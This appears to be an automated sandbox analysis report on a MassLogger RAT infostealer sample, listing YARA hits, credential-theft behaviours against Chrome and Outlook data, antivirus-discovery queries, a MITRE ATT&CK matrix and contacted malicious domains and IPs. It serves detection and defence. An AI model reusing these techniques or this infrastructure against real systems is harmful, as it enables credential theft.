Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Source: a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp	Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709230972.0000000000BC7000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp	Binary or memory string: e.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp	Binary or memory string: e(C:\Program Files\AVG\Antivirus\AVGUI.exe

Source: C:\ProgramData\a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information:

Yara detected MassLogger RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY

Remote Access Functionality:

Yara detected MassLogger RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation121	Registry Run Keys / Startup Folder1	Process Injection12	Disable or Modify Tools1	OS Credential Dumping1	File and Directory Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting22	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Deobfuscate/Decode Files or Information1	Input Capture1	System Information Discovery25	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Scripting22	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution43	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Security Software Discovery341	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter1	Network Logon Script	Network Logon Script	Software Packing2	LSA Secrets	Virtualization/Sandbox Evasion14	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell1	Rc.common	Rc.common	Masquerading11	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion14	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection12	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Network Configuration Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	100%	Joe Sandbox ML
C:\ProgramData\a.exe	100%	Joe Sandbox ML
C:\ProgramData\a.exe	8%	Metadefender		Browse
C:\ProgramData\a.exe	28%	ReversingLabs	ByteCode-MSIL.Infostealer.Maslog
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	28%	ReversingLabs	ByteCode-MSIL.Infostealer.Maslog

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
20.2.a.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139343		Download File
13.2.a.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139343		Download File

Domains

Source	Detection	Scanner	Label	Link
pastex.pro	2%	Virustotal		Browse
raw.githubusercontent.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://api.ipify.orgD	0%	URL Reputation	safe
http://api.ipify.orgD	0%	URL Reputation	safe
http://api.ipify.orgD	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://api.ipify.org4	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://raw.githubusercontent.com4	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
http://api.ipify	0%	Avira URL Cloud	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
http://pastex.pro	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pastex.pro	45.148.121.68	true	false	2%, Virustotal, Browse	unknown
elb097307-934924932.us-east-1.elb.amazonaws.com	54.225.220.115	true	false		high
us2.smtp.mailhostbox.com	208.91.199.223	true	false		high
raw.githubusercontent.com	185.199.108.133	true	false	0%, Virustotal, Browse	unknown
seyranikenger.com.tr	185.162.146.6	true	false		unknown
smtp.saleforceconsults.com	unknown	unknown	true		unknown
api.ipify.org	unknown	unknown	false		high
www.seyranikenger.com.tr	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://login.microsoftonline.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://shell.suite.office.com:1443	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://us2.smtp.mailhostbox.com	a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cdn.entity.	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://wus2-000.contentsync.	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://powerlift.acompli.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cortana.ai	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://api.aadrm.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api.ipify.orgD	a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://api.microsoftstream.com/api/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cr.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.galapagosdesign.com/DPlease	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api.ipify.org4	a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://portal.office.com/account/?ref=ClientMeControl	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	false		high
https://ecs.office.com/config/v2/Office	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://graph.ppe.windows.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://officeci.azurewebsites.net/api/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://globaldisco.crm.dynamics.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://store.officeppe.com/addinstemplate	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://raw.githubusercontent.com4	a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.odwebp.svc.ms	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://web.microsoftstream.com/video/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://graph.windows.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://dataservice.o365filtering.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false		high
